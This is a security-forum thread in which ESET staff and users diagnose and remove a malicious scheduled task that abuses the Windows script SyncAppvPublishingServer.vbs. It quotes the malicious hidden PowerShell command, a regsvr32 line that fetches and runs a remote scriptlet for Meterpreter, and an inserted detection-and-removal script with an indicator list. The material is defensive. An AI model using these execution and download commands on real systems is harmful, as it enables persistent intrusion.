Marcos (Administrator) Posted May 4, 2022

5 minutes ago, Shogun1 said:
> I have the folder C:\Windows\System32\Tasks in my Windows 11 and tried to erase it. I guess that is what you were saying, but I couldn't erase it! My question is: did you mean that folder, all of it, or did I misread that?

Please run Task Scheduler and delete the task Microsoft\Windows\NetService\Network\NetServices
itman Posted May 4, 2022 (edited)

@Marcos, I found an earlier variant of this attack dating back to 10/2021. This one wouldn't require admin privileges. Details posted below. Let's analyze:

1. The attacker created a Logs folder in the %LocalAppData% directory, then dropped a system-logs.txt file there.
2. He then leveraged the legitimate Windows system script SyncAppvPublishingServer.vbs to run a PowerShell script at task startup time.

Quote:
> Task: {258116A2-BD82-4698-9403-CE25E42EAEF1} - System32\Tasks\Microsoft\Windows\NetService\Network\NetServices => C:\Windows\System32\SyncAppvPublishingServer.vbs [1720 2019-12-07] (Microsoft Windows -> ) -> "n; $a = Get-Content "C:\Users\User\AppData\Local\logs\system-logs.txt" | Select -Index 17033;iex $a;hackbacktrack XoBJLWeei4NqeQuFneR9fArkoDLpp4Tj+YZu2tRZg3I=
>
> -Log Details-
> Protection Event Date: 10/6/21
> Protection Event Time: 1:11 PM
> Log File: 2b7dad48-26d9-11ec-87a2-bc5ff42b1b34.json
>
> -System Information-
> OS: Windows 10 (Build 19042.985)
> CPU: x64
> File System: NTFS
> User: System
>
> -Blocked Website Details-
> Malicious Website: 1 , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, Blocked, -1, -1, 0.0.0, ,
>
> -Website Data-
> Category: RiskWare
> Domain: ai.backend-chat.com
> IP Address: 172.67.170.251
> Port: 443
> Type: Outbound
> File: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

https://forums.malwarebytes.com/topic/279614-riskware-block-aibackend-chat/

EDIT - Per the OP's posted Autoruns text:

> + "\Microsoft\Windows\NetService\Network\NetServices" "" "(Verified) " "c:\windows\system32\syncappvpublishingserver.vbs" "12/7/2019 5:10 AM" "0/73"

Appears this bugger has been "flying under the ESET radar" for some time.

Oh, my. There it is:
https://lolbas-project.github.io/lolbas/Scripts/Syncappvpublishingserver/
https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/md/Syncappvpublishingserver.exe.md

Edited May 4, 2022 by itman
itman Posted May 4, 2022 (edited)

Also came across a Meterpreter remote attack using the "Squiblydoo" technique via SyncAppvPublishingServer.vbs.

Quote:
> SyncAppvPublishingServer.vbs "Break; regsvr32 /s /n /u /i:http://192.168.254.158:8080/jnQl1FJ.sct scrobj.dll"
>
> SyncAppvPublishingServer – Regsvr32
> SyncAppvPublishingServer – Meterpreter via Regsvr32

https://pentestlab.blog/tag/syncappvpublishingserver/

Edited May 4, 2022 by itman
Shogun1 Posted May 5, 2022

11 hours ago, Marcos said:
> Please run Task Scheduler and delete the task Microsoft\Windows\NetService\Network\NetServices

Hey there Marcos, I found C:\Windows\System32\Tasks\Microsoft\Windows\NetService\Network, but there is no file or folder called \NetServices after \Network; it is empty or hidden! What should I do in this case?

Regards,
Shogun1 Posted May 5, 2022

I wanted to add this popup, which shows every time I have my 3 laptops turned on:
itman Posted May 5, 2022

12 hours ago, Shogun1 said:
> I found C:\Windows\System32\Tasks\Microsoft\Windows\NetService\Network, but there is no file or folder called \NetServices after \Network; it is empty or hidden! What should I do in this case?

Open Windows Task Scheduler. Then open the Task Scheduler Library folder. Perform the following:

1. Open the Microsoft folder.
2. Open the Windows folder.
3. Navigate downward until the NetService folder is found. Open the NetService folder.
4. Take a screenshot of what is displayed and attach it to your next reply.
Shogun1 Posted May 5, 2022

Hey itman, here is the screenshot of what you asked for. Hopefully it's helpful.
itman Posted May 5, 2022

14 minutes ago, Shogun1 said:
> Here is the screenshot of what you asked for.

Repeat the same procedure. Right-click on NetServices and then select Delete. At this point, this scheduled task should no longer run at system startup time.
Shogun1 Posted May 5, 2022

3 minutes ago, itman said:
> Repeat the same procedure. Right-click on NetServices and then select Delete. At this point, this scheduled task should no longer run at system startup time.

Done; deleted it from 1 laptop and will perform the same thing on my other 2 laptops as well to see what's new! Please stand by for my next move in future replies.
Shogun1 Posted May 5, 2022

@itman, your trick worked and the notification has gone completely, but I have ESET Staff asking me for more info and further investigation to determine whether I have a malware infection or not! Thanks for your time and help, dude.
JamesR (ESET Staff) Posted May 6, 2022

I assisted Shogun1 with some more cleanup. There were 2 other scheduled tasks which used the same LOLBin trick. It is not uncommon for these PowerShell scheduled tasks to leverage multiple scheduled tasks to increase their persistence. Samples of everything have been gathered and submitted.
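The three things the thread does by hand can be done in one script: itman's first post shows the mechanism (a task whose only action is SyncAppvPublishingServer.vbs, with the real PowerShell smuggled in as the script's argument and a second stage read from one line of a large text file), itman later walks Shogun1 through Task Scheduler to find and delete the task, and JamesR notes that two more tasks reused the same LOLBin. The following is an added example, not code from the thread, from ESET or from any of the posters. It assumes Windows PowerShell 5.1 or later with the ScheduledTasks module, run elevated so tasks registered under \Microsoft\Windows\ by other accounts are visible; the indicator strings, the Find-SyncAppvTasks function name and the second-stage path (taken from the Malwarebytes log itman posted) are assumptions and will differ on other machines.

```powershell
# Added example (not from the thread or from ESET): find scheduled tasks that invoke
# SyncAppvPublishingServer.vbs with injected PowerShell, show the indicators, back up
# the task XML for sample submission, and unregister the task.
# Assumes: Windows PowerShell 5.1+, ScheduledTasks module, elevated prompt.

$LolBin = 'SyncAppvPublishingServer.vbs'

# Strings that should never appear in an argument handed to this script. The sample in
# the thread contained 'Get-Content ... | Select -Index 17033; iex $a'. Assumed list.
$Indicators = 'iex', 'Invoke-Expression', 'Get-Content', 'regsvr32',
              'DownloadString', 'FromBase64String', 'Net.WebClient', '-Index'

function Find-SyncAppvTasks {
    Get-ScheduledTask | ForEach-Object {
        $task = $_
        foreach ($action in $task.Actions) {
            # Exec actions expose Execute (program) and Arguments; COM-handler actions expose neither.
            $exe       = [string]$action.Execute
            $arguments = [string]$action.Arguments
            if (($exe + ' ' + $arguments) -notmatch [regex]::Escape($LolBin)) { continue }

            $hits = @($Indicators | Where-Object { $arguments -match [regex]::Escape($_) })
            [pscustomobject]@{
                TaskPath   = $task.TaskPath
                TaskName   = $task.TaskName
                State      = $task.State
                Author     = $task.Author
                Execute    = $exe
                Arguments  = $arguments
                Indicators = $hits -join ', '
                Suspicious = $hits.Count -gt 0
            }
        }
    }
}

$found = @(Find-SyncAppvTasks)
if ($found.Count -eq 0) {
    Write-Host "No scheduled task references $LolBin."
    return
}
$found | Format-List

# The .vbs itself is a signed Microsoft file; the task that calls it is the problem.
Get-AuthenticodeSignature "$env:SystemRoot\System32\$LolBin" |
    Select-Object Status, @{ n = 'Signer'; e = { $_.SignerCertificate.Subject } }

# Second stage from the posted log: one line of a large text file under %LocalAppData%\Logs.
# The file name is the one in that log and is an assumption for any other machine.
$Stage2 = Join-Path $env:LOCALAPPDATA 'Logs\system-logs.txt'
if (Test-Path $Stage2) {
    $lines = Get-Content $Stage2
    Write-Warning "Second-stage file present: $Stage2 ($($lines.Count) lines)"
    # Show the line the task would have executed (Select -Index is zero-based); do not run it.
    if ($lines.Count -gt 17033) { $lines[17033] }
}

# Back up each suspicious task's XML for submission, then unregister it.
foreach ($t in $found | Where-Object Suspicious) {
    $backup = Join-Path $env:TEMP ((($t.TaskPath + $t.TaskName) -replace '[\\/]', '_') + '.xml')
    Export-ScheduledTask -TaskPath $t.TaskPath -TaskName $t.TaskName |
        Set-Content -Path $backup -Encoding UTF8
    Unregister-ScheduledTask -TaskPath $t.TaskPath -TaskName $t.TaskName -Confirm:$false
    Write-Host "Removed $($t.TaskPath)$($t.TaskName); XML saved to $backup"
}
```

Unregister-ScheduledTask is the scripted equivalent of the right-click Delete in the Task Scheduler console. The files under C:\Windows\System32\Tasks, which Shogun1 was looking at, are only the on-disk XML copies of registered tasks; removing a task through the scheduler is what stops it running, and the exported XML is the artifact worth keeping for the sample submission JamesR mentions.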
formingus Posted June 10, 2022

On 5/6/2022 at 2:42 AM, JamesR said:
> I assisted Shogun1 with some more cleanup. There were 2 other scheduled tasks which used the same LOLBin trick. It is not uncommon for these PowerShell scheduled tasks to leverage multiple scheduled tasks to increase their persistence. Samples of everything have been gathered and submitted.

Hi, can you be kind and look at this thread: https://forum.eset.com/topic/32653-annoying-powershellagentaew-on-each-start-need-assitence/#comment-152054
Kevin999 Posted August 10, 2022

On 5/4/2022 at 8:39 PM, Shogun1 said:
> Hey Ted, I have the folder C:\Windows\System32\Tasks in my Windows 11 and tried to erase it. I guess that is what you were saying, but I couldn't erase it! My question is: did you mean that folder, all of it, or did I misread that?

The same virus. It seems to be caused by an UltraEdit cracker.
itman Posted August 10, 2022

11 hours ago, Kevin999 said:
> The same virus. It seems to be caused by an UltraEdit cracker.

In regards to this, a reference article: https://www.ultraedit.com/ultraedit-crack-code.html
Kevin999 Posted August 12, 2022

I am trying to recover the SyncAppvPublishingServer.vbs from EIS's quarantine, and I will send it to you later. @Marcos
Marcos (Administrator) Posted August 12, 2022

2 hours ago, Kevin999 said:
> I am trying to recover the SyncAppvPublishingServer.vbs from EIS's quarantine, and I will send it to you later. @Marcos

The detection is correct. The other script was a standard vbs file which is part of Windows installations.